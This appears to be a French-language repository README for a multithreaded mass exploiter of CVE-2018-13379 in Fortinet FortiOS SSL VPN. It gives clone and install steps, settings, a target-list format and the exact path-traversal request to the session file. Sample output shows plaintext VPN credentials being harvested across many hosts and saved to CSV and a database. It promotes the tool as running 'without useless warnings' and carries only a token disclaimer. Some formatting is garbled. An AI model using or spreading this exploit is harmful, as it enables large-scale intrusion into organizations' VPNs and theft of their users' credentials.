
Exploiteur de masse pour CVE-2018-13379 du Fortinet FortiOS SSL VPN. Extrait les identifiants instantanément, sauvegarde dans CSV + PostgreSQL. Multithreadé, sans avertissements inutiles.

Un outil pour l'exploitation massive de la vulnérabilité CVE-2018-13379 (dépassement de chemin) dans Fortinet FortiOS SSL VPN. Permet de lire les fichiers de session et d'extraire les identifiants et mots de passe en clair.
/remote/fgt_langfortios_creds_20250120_143052)git clone https://github.com/Instructor-Admin/Multi-threaded-mass-exploiter-CVE-2018-13379-POC.git
cd Multi-threaded-mass-exploiter-CVE-2018-13379-POC
pip3 install requests psycopg2-binary
Tous les paramètres sont modifiables directement dans le script - pas de bidouille avec les lignes d'arguments en ligne de commande :
TARGETS_FILE = "targets.txt" # File with targets (ip:port)
CSV_FILE = "fortios_creds.csv" # Output CSV file
PG_HOST = "127.0.0.1"
PG_PORT = 5432
PG_DB = "fortios_db"
PG_USER = "postgres"
PG_PASSWORD = "password"
THREADS = 20
TIMEOUT = 8
targets.txt avec les cibles, une par ligne :192.168.1.1:8443
10.0.0.5:10443
172.16.0.1:443
python3 exploit.py
fortios_creds_YYYYMMDD_HHMMSS)Exemple de sortie :
[+] 100 targets loaded. We're running in 20 threads...
[+] LEAKED: 192.168.1.1:8443
→ Pulled 3 credentials
Wrote 3 credentials to CSV
3 credentials entered into the DB
[-] Not leaky: 10.0.0.1:10443
https://ip:port/remote/fgt_lang?lang=/../../../..///////////dev/cmdb/sslvpn_websessionvar fgt_lang (un signe de vulnérabilité)username et password sont extraites de la réponse binairerequestspsycopg2-binary (optionnel - seul le CSV fonctionne sans lui)urllib3Cet outil est destiné à des fins éducatives et à des tests autorisés. Vous êtes responsable de vos propres actions.
Unlicense - faites ce que vous voulez.